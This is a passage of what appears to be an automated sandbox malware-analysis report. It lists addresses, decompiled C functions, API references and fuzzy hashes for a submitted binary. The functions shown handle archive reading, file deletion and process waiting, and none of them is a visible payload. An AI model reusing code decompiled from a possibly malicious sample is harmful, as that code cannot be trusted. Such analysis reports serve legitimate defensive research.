                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00000000
                                                                                    0x00407489
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x0040744d
                                                                                    0x00407447
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000
                                                                                    0x004075fa
                                                                                    0x00407447
                                                                                    0x004073ce
                                                                                    0x004073cb

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                    • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                    • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                    • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 93%
                                                                                    			E00403479(intOrPtr _a4) {
                                                                                    				intOrPtr _t11;
                                                                                    				signed int _t12;
                                                                                    				void* _t14;
                                                                                    				void* _t15;
                                                                                    				long _t16;
                                                                                    				void* _t18;
                                                                                    				intOrPtr _t31;
                                                                                    				intOrPtr _t34;
                                                                                    				void* _t37;
                                                                                    
                                                                                    				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                                                                                    				 *0x42a26c = GetTickCount() + 0x1f4;
                                                                                    				if(_t34 <= 0) {
                                                                                    					L22:
                                                                                    					E0040302E(1);
                                                                                    					return 0;
                                                                                    				}
                                                                                    				E004035F8( *0x420f04);
                                                                                    				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                                                    				 *0x420f00 = _t34;
                                                                                    				 *0x420ef0 = 0;
                                                                                    				while(1) {
                                                                                    					_t31 = 0x4000;
                                                                                    					_t11 =  *0x420ef8 -  *0x420f04;
                                                                                    					if(_t11 <= 0x4000) {
                                                                                    						_t31 = _t11;
                                                                                    					}
                                                                                    					_t12 = E004035E2(0x414ef0, _t31);
                                                                                    					if(_t12 == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					 *0x420f04 =  *0x420f04 + _t31;
                                                                                    					 *0x40ce80 = 0x414ef0;
                                                                                    					 *0x40ce84 = _t31;
                                                                                    					L6:
                                                                                    					L6:
                                                                                    					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                                                    						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                                                    						E0040302E(0);
                                                                                    					}
                                                                                    					 *0x40ce88 = 0x40cef0;
                                                                                    					 *0x40ce8c = 0x8000; // executed
                                                                                    					_t14 = E00406BB0(0x40ce68); // executed
                                                                                    					if(_t14 < 0) {
                                                                                    						goto L20;
                                                                                    					}
                                                                                    					_t37 =  *0x40ce88 - 0x40cef0;
                                                                                    					if(_t37 == 0) {
                                                                                    						if( *0x40ce84 != 0 || _t31 == 0) {
                                                                                    							goto L20;
                                                                                    						} else {
                                                                                    							L16:
                                                                                    							_t16 =  *0x420ef4;
                                                                                    							if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                                                    								continue;
                                                                                    							}
                                                                                    							SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                    							goto L22;
                                                                                    						}
                                                                                    					}
                                                                                    					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                                                    					if(_t18 == 0) {
                                                                                    						_push(0xfffffffe);
                                                                                    						L21:
                                                                                    						_pop(_t15);
                                                                                    						return _t15;
                                                                                    					}
                                                                                    					 *0x40ce60 =  *0x40ce60 + _t37;
                                                                                    					if( *0x40ce84 != 0) {
                                                                                    						goto L6;
                                                                                    					}
                                                                                    					goto L16;
                                                                                    					L20:
                                                                                    					_push(0xfffffffd);
                                                                                    					goto L21;
                                                                                    				}
                                                                                    				return _t12 | 0xffffffff;
                                                                                    			}












                                                                                    0x00403489
                                                                                    0x0040349c
                                                                                    0x004034a1
                                                                                    0x004035d1
                                                                                    0x004035d3
                                                                                    0x00000000
                                                                                    0x004035d9
                                                                                    0x004034ad
                                                                                    0x004034c0
                                                                                    0x004034c6
                                                                                    0x004034cc
                                                                                    0x004034d7
                                                                                    0x004034dc
                                                                                    0x004034e1
                                                                                    0x004034e9
                                                                                    0x004034eb
                                                                                    0x004034eb
                                                                                    0x004034f4
                                                                                    0x004034fb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403501
                                                                                    0x00403507
                                                                                    0x0040350d
                                                                                    0x00000000
                                                                                    0x00403513
                                                                                    0x00403519
                                                                                    0x00403539
                                                                                    0x0040353e
                                                                                    0x00403543
                                                                                    0x00403549
                                                                                    0x0040354f
                                                                                    0x00403559
                                                                                    0x00403560
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403568
                                                                                    0x0040356a
                                                                                    0x00403593
                                                                                    0x00000000
                                                                                    0x00403599
                                                                                    0x00403599
                                                                                    0x00403599
                                                                                    0x004035ac
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004035bb
                                                                                    0x00000000
                                                                                    0x004035bb
                                                                                    0x00403593
                                                                                    0x00403574
                                                                                    0x0040357b
                                                                                    0x004035c8
                                                                                    0x004035ce
                                                                                    0x004035ce
                                                                                    0x00000000
                                                                                    0x004035ce
                                                                                    0x0040357d
                                                                                    0x00403589
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004035cc
                                                                                    0x004035cc
                                                                                    0x00000000
                                                                                    0x004035cc
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 0040348D
                                                                                      • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer$CountTick
                                                                                    • String ID:
                                                                                    • API String ID: 1092082344-0
                                                                                    • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                    • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                    • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                    • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 41%
                                                                                    			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                                                                                    				int _t9;
                                                                                    				long _t13;
                                                                                    				WCHAR* _t14;
                                                                                    
                                                                                    				_t14 = _a4;
                                                                                    				_t13 = E00406133(_t14);
                                                                                    				if(_t13 == 0xffffffff) {
                                                                                    					L8:
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_push(_t14);
                                                                                    				if((_a8 & 0x00000001) == 0) {
                                                                                    					_t9 = DeleteFileW();
                                                                                    				} else {
                                                                                    					_t9 = RemoveDirectoryW(); // executed
                                                                                    				}
                                                                                    				if(_t9 == 0) {
                                                                                    					if((_a8 & 0x00000004) == 0) {
                                                                                    						SetFileAttributesW(_t14, _t13);
                                                                                    					}
                                                                                    					goto L8;
                                                                                    				} else {
                                                                                    					return 1;
                                                                                    				}
                                                                                    			}






                                                                                    0x00405d2d
                                                                                    0x00405d38
                                                                                    0x00405d3d
                                                                                    0x00405d6d
                                                                                    0x00000000
                                                                                    0x00405d6d
                                                                                    0x00405d44
                                                                                    0x00405d45
                                                                                    0x00405d4f
                                                                                    0x00405d47
                                                                                    0x00405d47
                                                                                    0x00405d47
                                                                                    0x00405d57
                                                                                    0x00405d63
                                                                                    0x00405d67
                                                                                    0x00405d67
                                                                                    0x00000000
                                                                                    0x00405d59
                                                                                    0x00000000
                                                                                    0x00405d5b

                                                                                    APIs
                                                                                      • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                      • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                    • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                    • String ID:
                                                                                    • API String ID: 1655745494-0
                                                                                    • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                    • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                                                    • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                    • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00406AE0(void* __ecx, void* _a4) {
                                                                                    				long _v8;
                                                                                    				long _t6;
                                                                                    
                                                                                    				_t6 = WaitForSingleObject(_a4, 0x64);
                                                                                    				while(_t6 == 0x102) {
                                                                                    					E00406A71(0xf);
                                                                                    					_t6 = WaitForSingleObject(_a4, 0x64);
                                                                                    				}
                                                                                    				GetExitCodeProcess(_a4,  &_v8); // executed
                                                                                    				return _v8;
                                                                                    			}





                                                                                    0x00406af1
                                                                                    0x00406b08
                                                                                    0x00406afc
                                                                                    0x00406b06
                                                                                    0x00406b06
                                                                                    0x00406b13
                                                                                    0x00406b1f

                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                                                    • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectSingleWait$CodeExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2567322000-0
                                                                                    • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                    • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                                                    • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                    • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 92%
                                                                                    			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                    				long _v8;
                                                                                    				long _t21;
                                                                                    				long _t22;
                                                                                    				void* _t24;
                                                                                    				long _t26;
                                                                                    				int _t27;
                                                                                    				long _t28;
                                                                                    				void* _t29;
                                                                                    				void* _t30;
                                                                                    				long _t31;
                                                                                    				long _t32;
                                                                                    				long _t36;
                                                                                    
                                                                                    				_t21 = _a4;
                                                                                    				if(_t21 >= 0) {
                                                                                    					_t32 = _t21 +  *0x42a2b8;
                                                                                    					 *0x420ef4 = _t32;
                                                                                    					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                    				}
                                                                                    				_t22 = E00403479(4);
                                                                                    				if(_t22 >= 0) {
                                                                                    					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                                                    					if(_t24 == 0) {
                                                                                    						L18:
                                                                                    						_push(0xfffffffd);
                                                                                    						goto L19;
                                                                                    					} else {
                                                                                    						 *0x420ef4 =  *0x420ef4 + 4;
                                                                                    						_t36 = E00403479(_a4);
                                                                                    						if(_t36 < 0) {
                                                                                    							L21:
                                                                                    							_t22 = _t36;
                                                                                    						} else {
                                                                                    							if(_a12 != 0) {
                                                                                    								_t26 = _a4;
                                                                                    								if(_t26 >= _a16) {
                                                                                    									_t26 = _a16;
                                                                                    								}
                                                                                    								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                    								if(_t27 != 0) {
                                                                                    									_t36 = _v8;
                                                                                    									 *0x420ef4 =  *0x420ef4 + _t36;
                                                                                    									goto L21;
                                                                                    								} else {
                                                                                    									goto L18;
                                                                                    								}
                                                                                    							} else {
                                                                                    								if(_a4 <= 0) {
                                                                                    									goto L21;
                                                                                    								} else {
                                                                                    									while(1) {
                                                                                    										_t28 = _a4;
                                                                                    										if(_a4 >= 0x4000) {
                                                                                    											_t28 = 0x4000;
                                                                                    										}
                                                                                    										_v8 = _t28;
                                                                                    										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                                                                                    										if(_t29 == 0) {
                                                                                    											goto L18;
                                                                                    										}
                                                                                    										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                                                    										if(_t30 == 0) {
                                                                                    											_push(0xfffffffe);
                                                                                    											L19:
                                                                                    											_pop(_t22);
                                                                                    										} else {
                                                                                    											_t31 = _v8;
                                                                                    											_a4 = _a4 - _t31;
                                                                                    											 *0x420ef4 =  *0x420ef4 + _t31;
                                                                                    											_t36 = _t36 + _t31;
                                                                                    											if(_a4 > 0) {
                                                                                    												continue;
                                                                                    											} else {
                                                                                    												goto L21;
                                                                                    											}
                                                                                    										}
                                                                                    										goto L22;
                                                                                    									}
                                                                                    									goto L18;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				L22:
                                                                                    				return _t22;
                                                                                    			}















                                                                                    0x00403375
                                                                                    0x0040337e
                                                                                    0x00403387
